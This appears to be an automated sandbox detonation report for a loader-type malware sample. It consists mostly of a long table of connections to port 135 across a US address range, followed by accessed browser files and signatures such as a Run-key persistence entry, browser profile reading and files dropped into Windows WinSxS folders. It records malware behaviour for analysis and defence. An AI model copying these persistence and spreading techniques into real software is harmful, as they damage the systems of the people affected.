| US | 209.76.61.196:135 | tcp | |
| US | 209.76.61.197:135 | tcp | |
| US | 209.76.61.198:135 | tcp | |
| US | 209.76.61.199:135 | tcp | |
| US | 209.76.61.200:135 | tcp | |
| US | 209.76.61.201:135 | tcp | |
| US | 209.76.61.202:135 | tcp | |
| US | 209.76.61.203:135 | tcp | |
| US | 209.76.61.204:135 | tcp | |
| US | 209.76.61.205:135 | tcp | |
| US | 209.76.61.206:135 | tcp | |
| US | 209.76.61.207:135 | tcp | |
| US | 209.76.61.208:135 | tcp | |
| US | 209.76.61.209:135 | tcp | |
| US | 209.76.61.210:135 | tcp | |
| US | 209.76.61.211:135 | tcp | |
| US | 209.76.61.212:135 | tcp | |
| US | 209.76.61.213:135 | tcp | |
| US | 209.76.61.214:135 | tcp | |
| US | 209.76.61.215:135 | tcp | |
| US | 209.76.61.216:135 | tcp | |
| US | 209.76.61.217:135 | tcp | |
| US | 209.76.61.218:135 | tcp | |
| US | 209.76.61.219:135 | tcp | |
| US | 209.76.61.220:135 | tcp | |
| US | 209.76.61.221:135 | tcp | |
| US | 209.76.61.222:135 | tcp | |
| US | 209.76.61.223:135 | tcp | |
| US | 209.76.61.224:135 | tcp | |
| US | 209.76.61.225:135 | tcp | |
| US | 209.76.61.226:135 | tcp | |
| US | 209.76.61.227:135 | tcp | |
| US | 209.76.61.228:135 | tcp | |
| US | 209.76.61.229:135 | tcp | |
| US | 209.76.61.230:135 | tcp | |
| US | 209.76.61.231:135 | tcp | |
| US | 209.76.61.232:135 | tcp | |
| US | 209.76.61.233:135 | tcp | |
| US | 209.76.61.234:135 | tcp | |
| US | 209.76.61.235:135 | tcp | |
| US | 209.76.61.236:135 | tcp | |
| US | 209.76.61.237:135 | tcp | |
| US | 209.76.61.238:135 | tcp | |
| US | 209.76.61.239:135 | tcp | |
| US | 209.76.61.240:135 | tcp | |
| US | 209.76.61.241:135 | tcp | |
| US | 209.76.61.242:135 | tcp | |
| US | 209.76.61.243:135 | tcp | |
| US | 209.76.61.244:135 | tcp | |
| US | 209.76.61.245:135 | tcp | |
| US | 209.76.61.246:135 | tcp | |
| US | 209.76.61.247:135 | tcp | |
| US | 209.76.61.248:135 | tcp | |
| US | 209.76.61.249:135 | tcp | |
| US | 209.76.61.250:135 | tcp | |
| US | 209.76.61.251:135 | tcp | |
| US | 209.76.61.252:135 | tcp | |
| US | 209.76.61.253:135 | tcp | |
| US | 209.76.61.254:135 | tcp | |
| US | 209.76.61.255:135 | tcp | |
| US | 209.76.62.0:135 | tcp | |
| US | 209.76.62.1:135 | tcp | |
| US | 209.76.62.2:135 | tcp | |
| US | 209.76.62.3:135 | tcp | |
| US | 209.76.62.4:135 | tcp | |
| US | 209.76.62.5:135 | tcp | |
| US | 209.76.62.6:135 | tcp | |
| US | 209.76.62.7:135 | tcp | |
| US | 209.76.62.8:135 | tcp | |
| US | 209.76.62.9:135 | tcp | |
| US | 209.76.62.10:135 | tcp | |
| US | 209.76.62.11:135 | tcp | |
| US | 209.76.62.12:135 | tcp | |
| US | 209.76.62.13:135 | tcp | |
| US | 209.76.62.14:135 | tcp | |
| US | 209.76.62.15:135 | tcp | |
| US | 209.76.62.16:135 | tcp | |
| US | 209.76.62.17:135 | tcp | |
| US | 209.76.62.18:135 | tcp | |
| US | 209.76.62.19:135 | tcp | |
| US | 209.76.62.20:135 | tcp | |
| US | 209.76.62.21:135 | tcp | |
| US | 209.76.62.22:135 | tcp | |
| US | 209.76.62.23:135 | tcp | |
| US | 209.76.62.24:135 | tcp | |
| US | 209.76.62.25:135 | tcp | |
| US | 209.76.62.26:135 | tcp | |
| US | 209.76.62.27:135 | tcp | |
| US | 209.76.62.28:135 | tcp | |
| US | 209.76.62.29:135 | tcp | |
| US | 209.76.62.30:135 | tcp | |
| US | 209.76.62.31:135 | tcp | |
| US | 209.76.62.32:135 | tcp | |
| US | 209.76.62.33:135 | tcp | |
| US | 209.76.62.34:135 | tcp | |
| US | 209.76.62.35:135 | tcp | |
| US | 209.76.62.36:135 | tcp | |
| US | 209.76.62.37:135 | tcp | |
| US | 209.76.62.38:135 | tcp | |
| US | 209.76.62.39:135 | tcp | |
| US | 209.76.62.40:135 | tcp | |
| US | 209.76.62.41:135 | tcp | |
| US | 209.76.62.42:135 | tcp | |
| US | 209.76.62.43:135 | tcp | |
| US | 209.76.62.44:135 | tcp | |
| US | 209.76.62.45:135 | tcp | |
| US | 209.76.62.46:135 | tcp | |
| US | 209.76.62.47:135 | tcp | |
| US | 209.76.62.48:135 | tcp | |
| US | 209.76.62.49:135 | tcp | |
| US | 209.76.62.50:135 | tcp | |
| US | 209.76.62.51:135 | tcp | |
| US | 209.76.62.52:135 | tcp | |
| US | 209.76.62.53:135 | tcp | |
| US | 209.76.62.54:135 | tcp | |
| US | 209.76.62.55:135 | tcp | |
| US | 209.76.62.56:135 | tcp | |
| US | 209.76.62.57:135 | tcp | |
| US | 209.76.62.58:135 | tcp | |
| US | 209.76.62.59:135 | tcp | |
| US | 209.76.62.60:135 | tcp | |
| US | 209.76.62.61:135 | tcp | |
| US | 209.76.62.62:135 | tcp | |
| US | 209.76.62.63:135 | tcp | |
| US | 209.76.62.64:135 | tcp | |
| US | 209.76.62.65:135 | tcp | |
| US | 209.76.62.66:135 | tcp | |
| US | 209.76.62.67:135 | tcp | |
| US | 209.76.62.68:135 | tcp | |
| US | 209.76.62.69:135 | tcp | |
| US | 209.76.62.70:135 | tcp | |
| US | 209.76.62.71:135 | tcp | |
| US | 209.76.62.72:135 | tcp | |
| US | 209.76.62.73:135 | tcp | |
| US | 209.76.62.74:135 | tcp | |
| US | 209.76.62.75:135 | tcp | |
| US | 209.76.62.76:135 | tcp | |
| US | 209.76.62.77:135 | tcp | |
| US | 209.76.62.78:135 | tcp | |
| US | 209.76.62.79:135 | tcp | |
| US | 209.76.62.80:135 | tcp | |
| US | 209.76.62.81:135 | tcp | |
| US | 209.76.62.82:135 | tcp | |
| US | 209.76.62.83:135 | tcp | |
| US | 209.76.62.84:135 | tcp | |
| US | 209.76.62.85:135 | tcp | |
| US | 209.76.62.86:135 | tcp | |
| US | 209.76.62.87:135 | tcp | |
| US | 209.76.62.88:135 | tcp | |
| US | 209.76.62.89:135 | tcp | |
| US | 209.76.62.90:135 | tcp | |
| US | 209.76.62.91:135 | tcp | |
| US | 209.76.62.92:135 | tcp | |
| US | 209.76.62.93:135 | tcp | |
| US | 209.76.62.94:135 | tcp | |
| US | 209.76.62.95:135 | tcp | |
| US | 209.76.62.96:135 | tcp | |
| US | 209.76.62.97:135 | tcp | |
| US | 209.76.62.98:135 | tcp | |
| US | 209.76.62.99:135 | tcp | |
| US | 209.76.62.100:135 | tcp | |
| US | 209.76.62.101:135 | tcp | |
| US | 209.76.62.102:135 | tcp | |
| US | 209.76.62.103:135 | tcp | |
| US | 209.76.62.104:135 | tcp | |
| US | 209.76.62.105:135 | tcp | |
| US | 209.76.62.106:135 | tcp | |
| US | 209.76.62.107:135 | tcp | |
| US | 209.76.62.108:135 | tcp | |
| GB | 2.18.27.82:443 | www.bing.com | udp |
| US | 209.76.62.109:135 | tcp | |
| US | 209.76.62.110:135 | tcp | |
| US | 209.76.62.111:135 | tcp | |
| US | 209.76.62.112:135 | tcp | |
| US | 209.76.62.113:135 | tcp | |
| US | 209.76.62.114:135 | tcp | |
| US | 209.76.62.115:135 | tcp | |
| US | 209.76.62.116:135 | tcp | |
| US | 209.76.62.117:135 | tcp | |
| US | 209.76.62.118:135 | tcp | |
| US | 209.76.62.119:135 | tcp | |
| US | 209.76.62.120:135 | tcp | |
| US | 209.76.62.121:135 | tcp | |
| US | 209.76.62.122:135 | tcp | |
| US | 209.76.62.123:135 | tcp | |
| US | 209.76.62.124:135 | tcp | |
| US | 209.76.62.125:135 | tcp | |
| US | 209.76.62.126:135 | tcp | |
| US | 209.76.62.127:135 | tcp | |
| US | 209.76.62.128:135 | tcp | |
| US | 209.76.62.129:135 | tcp | |
| US | 209.76.62.130:135 | tcp | |
| US | 209.76.62.131:135 | tcp | |
| US | 209.76.62.132:135 | tcp | |
| US | 209.76.62.133:135 | tcp | |
| US | 209.76.62.134:135 | tcp | |
| US | 209.76.62.135:135 | tcp | |
| US | 209.76.62.136:135 | tcp | |
| US | 209.76.62.137:135 | tcp | |
| US | 209.76.62.138:135 | tcp | |
| US | 209.76.62.139:135 | tcp | |
| US | 209.76.62.140:135 | tcp | |
| US | 209.76.62.141:135 | tcp | |
| US | 209.76.62.142:135 | tcp | |
| US | 209.76.62.143:135 | tcp | |
| US | 209.76.62.144:135 | tcp | |
| US | 209.76.62.145:135 | tcp | |
| US | 209.76.62.146:135 | tcp | |
| US | 209.76.62.147:135 | tcp | |
| US | 209.76.62.148:135 | tcp | |
| US | 209.76.62.149:135 | tcp | |
| US | 209.76.62.150:135 | tcp | |
| US | 209.76.62.151:135 | tcp | |
| US | 209.76.62.152:135 | tcp | |
| US | 209.76.62.153:135 | tcp | |
| US | 209.76.62.154:135 | tcp | |
| US | 209.76.62.155:135 | tcp | |
| US | 209.76.62.156:135 | tcp | |
| US | 209.76.62.157:135 | tcp | |
| US | 209.76.62.158:135 | tcp | |
| US | 209.76.62.159:135 | tcp | |
| US | 209.76.62.160:135 | tcp | |
| US | 209.76.62.161:135 | tcp | |
| US | 209.76.62.162:135 | tcp | |
| US | 209.76.62.163:135 | tcp | |
| US | 209.76.62.164:135 | tcp | |
| US | 209.76.62.165:135 | tcp | |
| US | 209.76.62.166:135 | tcp | |
| US | 209.76.62.167:135 | tcp | |
| US | 209.76.62.168:135 | tcp | |
| US | 209.76.62.169:135 | tcp | |
| US | 209.76.62.170:135 | tcp | |
| US | 209.76.62.171:135 | tcp | |
| US | 209.76.62.172:135 | tcp | |
| US | 209.76.62.173:135 | tcp | |
| US | 209.76.62.174:135 | tcp | |
| US | 209.76.62.175:135 | tcp | |
| US | 209.76.62.176:135 | tcp | |
| US | 209.76.62.177:135 | tcp | |
| US | 209.76.62.178:135 | tcp | |
| US | 209.76.62.179:135 | tcp | |
| US | 209.76.62.180:135 | tcp | |
| US | 209.76.62.181:135 | tcp | |
| US | 209.76.62.182:135 | tcp | |
| US | 209.76.62.183:135 | tcp | |
| US | 209.76.62.184:135 | tcp | |
| US | 209.76.62.185:135 | tcp | |
| US | 209.76.62.186:135 | tcp | |
| US | 209.76.62.187:135 | tcp | |
| US | 209.76.62.188:135 | tcp | |
| US | 209.76.62.189:135 | tcp | |
| US | 209.76.62.190:135 | tcp | |
| US | 209.76.62.191:135 | tcp | |
| US | 209.76.62.192:135 | tcp | |
| US | 209.76.62.193:135 | tcp | |
| US | 209.76.62.194:135 | tcp | |
| US | 209.76.62.195:135 | tcp | |
| US | 209.76.62.196:135 | tcp | |
| US | 209.76.62.197:135 | tcp | |
| US | 209.76.62.198:135 | tcp | |
| US | 209.76.62.199:135 | tcp | |
| US | 209.76.62.200:135 | tcp | |
| US | 209.76.62.201:135 | tcp | |
| US | 209.76.62.202:135 | tcp | |
| US | 209.76.62.203:135 | tcp | |
| US | 209.76.62.204:135 | tcp | |
| US | 209.76.62.205:135 | tcp | |
| US | 209.76.62.206:135 | tcp | |
| US | 209.76.62.207:135 | tcp | |
| US | 209.76.62.208:135 | tcp | |
| US | 209.76.62.209:135 | tcp | |
| US | 209.76.62.210:135 | tcp | |
| US | 209.76.62.211:135 | tcp | |
| US | 209.76.62.212:135 | tcp | |
| US | 209.76.62.213:135 | tcp | |
| US | 209.76.62.214:135 | tcp | |
| US | 209.76.62.215:135 | tcp | |
| US | 209.76.62.216:135 | tcp | |
| US | 209.76.62.217:135 | tcp | |
| US | 209.76.62.218:135 | tcp | |
| US | 209.76.62.219:135 | tcp | |
| US | 209.76.62.220:135 | tcp | |
| US | 209.76.62.221:135 | tcp | |
| US | 209.76.62.222:135 | tcp | |
| US | 209.76.62.223:135 | tcp | |
| US | 209.76.62.224:135 | tcp | |
| US | 209.76.62.225:135 | tcp | |
| US | 209.76.62.226:135 | tcp | |
| US | 209.76.62.227:135 | tcp | |
| US | 209.76.62.228:135 | tcp | |
| US | 209.76.62.229:135 | tcp | |
| US | 209.76.62.230:135 | tcp | |
| US | 209.76.62.231:135 | tcp | |
| US | 209.76.62.232:135 | tcp | |
| US | 209.76.62.233:135 | tcp | |
| US | 209.76.62.234:135 | tcp | |
| US | 209.76.62.235:135 | tcp | |
| US | 209.76.62.236:135 | tcp | |
| US | 209.76.62.237:135 | tcp | |
| US | 209.76.62.238:135 | tcp | |
| US | 209.76.62.239:135 | tcp | |
| US | 209.76.62.240:135 | tcp | |
| US | 209.76.62.241:135 | tcp | |
| US | 209.76.62.242:135 | tcp | |
| US | 209.76.62.243:135 | tcp | |
| US | 209.76.62.244:135 | tcp | |
| US | 209.76.62.245:135 | tcp | |
| US | 209.76.62.246:135 | tcp | |
| US | 209.76.62.247:135 | tcp | |
| US | 209.76.62.248:135 | tcp | |
| US | 209.76.62.249:135 | tcp | |
| US | 209.76.62.250:135 | tcp | |
| US | 209.76.62.251:135 | tcp | |
| US | 209.76.62.252:135 | tcp | |
| US | 209.76.62.253:135 | tcp | |
| US | 209.76.62.254:135 | tcp | |
| US | 209.76.62.255:135 | tcp | |
| US | 209.76.63.0:135 | tcp | |
| US | 209.76.63.1:135 | tcp | |
| US | 209.76.63.2:135 | tcp | |
| US | 209.76.63.3:135 | tcp | |
| US | 209.76.63.4:135 | tcp | |
| US | 209.76.63.5:135 | tcp | |
| US | 209.76.63.6:135 | tcp | |
| US | 209.76.63.7:135 | tcp | |
| US | 209.76.63.8:135 | tcp | |
| US | 209.76.63.9:135 | tcp | |
| US | 209.76.63.10:135 | tcp | |
| US | 209.76.63.11:135 | tcp | |
| US | 209.76.63.12:135 | tcp | |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 209.76.63.13:135 | tcp | |
| US | 209.76.63.14:135 | tcp | |
| US | 209.76.63.15:135 | tcp | |
| US | 209.76.63.16:135 | tcp | |
| US | 209.76.63.17:135 | tcp | |
| US | 209.76.63.18:135 | tcp | |
| US | 209.76.63.19:135 | tcp | |
| US | 209.76.63.20:135 | tcp | |
| US | 209.76.63.21:135 | tcp | |
| US | 209.76.63.22:135 | tcp | |
| US | 209.76.63.23:135 | tcp | |
| US | 209.76.63.24:135 | tcp | |
| US | 209.76.63.25:135 | tcp | |
| US | 209.76.63.26:135 | tcp | |
| US | 209.76.63.27:135 | tcp | |
| US | 209.76.63.28:135 | tcp | |
| US | 209.76.63.29:135 | tcp | |
| US | 209.76.63.30:135 | tcp | |
| US | 209.76.63.31:135 | tcp | |
| US | 209.76.63.32:135 | tcp | |
| US | 209.76.63.33:135 | tcp | |
| US | 209.76.63.34:135 | tcp | |
| US | 209.76.63.35:135 | tcp | |
| US | 209.76.63.36:135 | tcp | |
| US | 209.76.63.37:135 | tcp | |
| US | 209.76.63.38:135 | tcp | |
| US | 209.76.63.39:135 | tcp | |
| US | 209.76.63.40:135 | tcp | |
| US | 209.76.63.41:135 | tcp | |
| US | 209.76.63.42:135 | tcp | |
| US | 209.76.63.43:135 | tcp | |
| US | 209.76.63.44:135 | tcp | |
| US | 209.76.63.45:135 | tcp | |
| US | 209.76.63.46:135 | tcp | |
| US | 209.76.63.47:135 | tcp | |
| US | 209.76.63.48:135 | tcp | |
| US | 209.76.63.49:135 | tcp | |
| US | 209.76.63.50:135 | tcp | |
| US | 209.76.63.51:135 | tcp | |
| US | 209.76.63.52:135 | tcp | |
| US | 209.76.63.53:135 | tcp | |
| US | 209.76.63.54:135 | tcp | |
| US | 209.76.63.55:135 | tcp | |
| US | 209.76.63.56:135 | tcp | |
| US | 209.76.63.57:135 | tcp | |
| US | 209.76.63.58:135 | tcp | |
| US | 209.76.63.59:135 | tcp | |
| US | 209.76.63.60:135 | tcp | |
| US | 209.76.63.61:135 | tcp | |
| US | 209.76.63.62:135 | tcp | |
| US | 209.76.63.63:135 | tcp | |
| US | 209.76.63.64:135 | tcp | |
| US | 209.76.63.65:135 | tcp | |
| US | 209.76.63.66:135 | tcp | |
| US | 209.76.63.67:135 | tcp | |
| US | 209.76.63.68:135 | tcp | |
| US | 209.76.63.69:135 | tcp | |
| US | 209.76.63.70:135 | tcp | |
| US | 209.76.63.71:135 | tcp | |
| US | 209.76.63.72:135 | tcp | |
| US | 209.76.63.73:135 | tcp | |
| US | 209.76.63.74:135 | tcp | |
| US | 209.76.63.75:135 | tcp | |
| US | 209.76.63.76:135 | tcp | |
| US | 209.76.63.77:135 | tcp | |
| US | 209.76.63.78:135 | tcp | |
| US | 209.76.63.79:135 | tcp | |
| US | 209.76.63.80:135 | tcp | |
| US | 209.76.63.81:135 | tcp | |
| US | 209.76.63.82:135 | tcp | |
| US | 209.76.63.83:135 | tcp | |
| US | 209.76.63.84:135 | tcp | |
| US | 209.76.63.85:135 | tcp | |
| US | 209.76.63.86:135 | tcp | |
| US | 209.76.63.87:135 | tcp | |
| US | 209.76.63.88:135 | tcp | |
| US | 209.76.63.89:135 | tcp | |
| US | 209.76.63.90:135 | tcp | |
| US | 209.76.63.91:135 | tcp | |
| US | 209.76.63.92:135 | tcp | |
| US | 209.76.63.93:135 | tcp | |
| US | 209.76.63.94:135 | tcp | |
| US | 209.76.63.95:135 | tcp | |
| US | 209.76.63.96:135 | tcp | |
| US | 209.76.63.97:135 | tcp | |
| US | 209.76.63.98:135 | tcp | |
| US | 209.76.63.99:135 | tcp | |
| US | 209.76.63.100:135 | tcp | |
| US | 209.76.63.101:135 | tcp | |
| US | 209.76.63.102:135 | tcp | |
| US | 209.76.63.103:135 | tcp | |
| US | 209.76.63.104:135 | tcp | |
| US | 209.76.63.105:135 | tcp | |
| US | 209.76.63.106:135 | tcp | |
| US | 209.76.63.107:135 | tcp | |
| US | 209.76.63.108:135 | tcp | |
| US | 209.76.63.109:135 | tcp | |
| US | 209.76.63.110:135 | tcp | |
| US | 209.76.63.111:135 | tcp | |
| US | 209.76.63.112:135 | tcp |
Files
C:\Program Files\7-Zip\7z.exe-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
\??\pipe\crashpad_3192_OVRUJBNNVWUXDOKS
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\favorites_diagnostic.log
C:\Users\Admin\AppData\Local\Temp\scoped_dir3192_1714011659\d01e9c01-2f11-495c-9709-3adf1ea705d5.tmp
C:\Users\Admin\AppData\Local\Temp\e22f4d7d-003e-4f5b-bfe1-8c9a4f346533.tmp
C:\Users\Admin\AppData\Local\Temp\d4697c4a-e6eb-455e-ae56-cdba40478400.tmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\content.js
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57a047.TMP
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\d27a09a4-e9a5-415c-8116-b5c3930f1a1a.tmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog~RFe583dee.TMP
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3192_80005162\manifest.json
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.9\protocols.json
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3192_1405593516\manifest.json
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3192_1665039492\manifest.json
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent\1.0.0.5\nav_config.json
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3192_288258558\manifest.json
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Data Protection Lists\2.0.0.0\office_endpoints_list.json
Analysis: behavioral1
Detonation Overview
Submitted
2025-07-04 12:07
Reported
2025-07-04 12:09
Platform
win10v2004-20250619-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Contacts a large (1018) amount of remote hosts
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ati display driver = "ÔN@" | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-cleanmgr_31bf3856ad364e35_10.0.19041.1266_none_e20a09e712bd275c\cleanmgr.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-com-complus-setup_31bf3856ad364e35_10.0.19041.1_none_9f98e6cc8eabb4ca\mtstocom.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-embedded-shelllauncher_31bf3856ad364e35_10.0.19041.1202_none_b918e36ffc7a6ffe\eshell.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-wlan-extension_31bf3856ad364e35_10.0.19041.1_none_afd43cb1c2b70f77\wlanext.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-commandprompt_31bf3856ad364e35_10.0.19041.1_none_4b527e92ee1ad1e5\cmd.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-sharedaccess_31bf3856ad364e35_10.0.19041.1_none_c513167c1d0a90dd\icsunattend.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-nfs-admincmdtools_31bf3856ad364e35_10.0.19041.1_none_6a9f2a3a3265ab31\nfsadmin.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.19041.546_none_3f1cc1d15da468cf\logman.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_hyperv-compute-host-service_31bf3856ad364e35_10.0.19041.1288_none_6c70124c60e2b4ef\r\vmcompute.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-utilman_31bf3856ad364e35_10.0.19041.789_none_e07abbe9902a4f60\r\Utilman.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-d..ommandline-adamsync_31bf3856ad364e35_10.0.19041.1081_none_6700b2d2d3c0055f\f\adamsync.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.264_none_b435e08254cda322\f\printui.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.19041.1_none_56e67ce6d0d5a465\RMActivate.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-unattendedjoin_31bf3856ad364e35_10.0.19041.1_none_6905f2230c3224a7\djoin.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.19041.906_none_87b019d7cebd66d4\f\appcmd.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-networkux-legacyux_31bf3856ad364e35_10.0.19041.1266_none_92496ac84272f5f1\LegacyNetUXHost.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-x..jectdialog.appxmain_31bf3856ad364e35_10.0.19041.423_none_d93ee361fbbc8f0a\f\XGpuEjectDialog.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-getmac_31bf3856ad364e35_10.0.19041.1_none_cc444e9075b95adf\getmac.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-winre-recoverytools_31bf3856ad364e35_10.0.19041.746_none_bd9bc99304595128\ReAgentc.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-browser-brokers_31bf3856ad364e35_11.0.19041.746_none_581ccf386ba57d51\browserexport.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-defrag-adminui_31bf3856ad364e35_10.0.19041.84_none_90b92bf6be625d1b\r\dfrgui.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-ie-iechooser_31bf3856ad364e35_11.0.19041.746_none_122a74c9827fe81a\f\IEChooser.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.19041.1266_none_14b8c34dbc1df417\runexehelper.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.19041.906_none_9204c42a031e28cf\iissetup.exe_ | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-newdev_31bf3856ad364e35_10.0.19041.1202_none_908b22903a403149\f\newdev.exe- | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | N/A |
